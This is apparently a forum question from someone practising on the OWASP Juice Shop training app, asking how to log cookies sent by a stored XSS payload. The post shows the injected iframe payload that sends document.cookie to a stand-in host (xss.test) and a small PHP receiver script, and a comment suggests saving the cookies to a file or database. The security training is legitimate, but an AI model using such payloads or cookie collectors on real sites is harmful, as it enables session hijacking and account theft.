# How can I send cookies from one application to another and store them

Tags: javascript, php, cookies, xss, owasp

I'm currently doing some challenges on OWASP Juice-Shop locally and I'm trying to store Javascriptcode in an iframe.
I've sent a POST Request with the body

`{"name": "XSS", "description": "<iframe src=\"http://xss.test/?cookie=' + document.cookie + '\">"}`

and it stored it in the application as a new product. In theory, when I click on the product it should send the cookies of the current user to my script on xss.test. I created a virtualhost xss.test with xampp, that contains the php script

```
$cookies = $_GET['cookie'];

echo $cookies;
```

on index.php. Is there a way I can store the cookies sent via the parameter so that I can access xss.test and see all the cookies I gathered?

Comment: Use some storage like file, SQLite or SQL database. Simplest is to store csv or json data in local file or use SQLite database.

Comment: I stored it in a php file, that worked, thanks!